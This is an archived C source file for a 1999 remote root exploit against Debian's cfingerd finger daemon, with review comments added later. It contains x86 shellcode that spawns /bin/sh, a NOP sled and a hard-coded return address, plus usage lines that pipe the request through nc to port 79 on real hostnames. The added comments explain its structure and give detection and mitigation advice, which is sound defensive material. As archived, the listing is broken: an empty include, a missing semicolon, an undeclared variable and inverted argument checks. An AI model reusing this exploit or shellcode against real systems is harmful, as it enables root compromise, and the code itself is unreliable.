/*
 * - Imperfection Security Presents -
 *
 * Debian GNU/Linux cfingerd remote root exploit
 * From shakey, of Imperfection Security [07/99]
 *
 * Exploits a problem reported on BUGTRAQ in Debian's cfingerd. This exploit
 * is remotely exploitable, and leaves the attacker a root shell on
 * vulnerable systems. However, this attack is less susceptible to
 * mass-probing from script kiddies due to the lack of a banner from the
 * finger service ;D
 *
 * Affected Systems:
 *   + Debian Linux 2.0r5, 2.0, 1.3.1, 1.3, 1.2
 *
 * Greetings: dave, unknown, syntax, naptime, jaz, blitzed t0m, insane, DSC,
 *            short, vicci, crime, SDI ( nice shellcode generator ), phewl,
 *            phenom, punish, kindred, tom-, justin
 *
 * Usage: IS-finger [offset]
 * Example: (./IS-finger 0; cat) | nc linux.org 79
 */

/*
 * Analysis notes (added in review):
 *
 * - Structure: the program writes one oversized finger request to stdout.
 *   The request is assembled in buf[] from a run of 0x90 bytes (the x86 NOP
 *   opcode), the bytes of shellcode[], and a guessed stack address
 *   (0xbffff3c0 + offset) stored least-significant byte first. The usage
 *   line in the header pipes that output to TCP port 79.
 * - State of the listing: as archived it is not buildable. The #include
 *   target is missing and `host` is never declared in the visible code.
 *   It is documented here as a historical artifact; the code is unchanged.
 * - Detection: a finger query far longer than any plausible user name,
 *   a long run of 0x90 bytes, or the literal string /bin/sh inside a
 *   request on port 79 are all strong indicators of this class of attack.
 * - Mitigation: update or remove cfingerd on the releases listed above and
 *   avoid running a finger daemon with root privileges. The payload relies
 *   on a fixed, executable stack address, so a non-executable stack and
 *   address-space randomization break that assumption.
 */

/* The header name after #include is absent in the archived text. */
#include

/*
 * Payload bytes copied verbatim into the request. This is x86 machine code;
 * the trailing bytes are the literal string /bin/sh. Per the header comment
 * it is intended to yield a shell on the target.
 * NOTE(review): the initializer has no terminating semicolon in the archive.
 */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh"

/*
 * Builds the request in a local buffer and prints it to stdout followed by
 * CRLF. Nothing is sent over the network by this program itself; delivery
 * is left to the pipeline shown in the usage text.
 *
 * argv[1], when read, is parsed with atoi() as a signed adjustment to the
 * hard-coded address.
 */
main (int argc, char *argv[])
{
  char buf[2500];          /* request under construction */
  int x,y=1000, offset=0;  /* x: write index into buf; y: read index into shellcode */
  long addr;               /* address written into the request */
  int bsize=986;           /* nominal length of the padding + payload region */

  /* Prints the banner and usage text, then exits, when argc > 1. */
  if ( argc > 1)
    {
      printf ( "Imperfection Securities\' cfingerd exploit.");
      printf ( "Usage: (./IS-finger [offset]; cat) | nc debian.org 79\n");
      exit (0);
    }

  /* Reads the offset from argv[1] whenever argc > 0. */
  if ( argc > 0)
    offset = atoi (argv[1]);

  /* Hard-coded stack address plus the caller-supplied offset. */
  addr = 0xbffff3c0 + offset;

  /* `host` is not declared anywhere in the visible listing. */
  bsize -= strlen ( host);

  /* Padding: fill the front of the buffer with 0x90 bytes. */
  for ( x = 0; x < bsize-strlen(shellcode); x++)
    buf[x] = 0x90;

  /* Append the payload bytes directly after the padding. */
  for ( y = 0; y < strlen(shellcode); x++, y++)
    buf[x] = shellcode[y];

  /* While x < 72, store addr in 4-byte groups, low byte first. */
  for (  ; x < 72; x+=4)
    {
      buf[x  ] = addr & 0x000000ff;
      buf[x+1] = (addr & 0x0000ff00) >> 8;
      buf[x+2] = (addr & 0x00ff0000) >> 16;
      buf[x+3] = (addr & 0xff000000) >> 24;
    }

  /* One-second pause before the request is written out. */
  sleep (1);

  /* Emit the buffer as a string with a CRLF line ending. */
  printf ( "%s\r\n", buf);
}
/* www.hack.co.za [2000]*/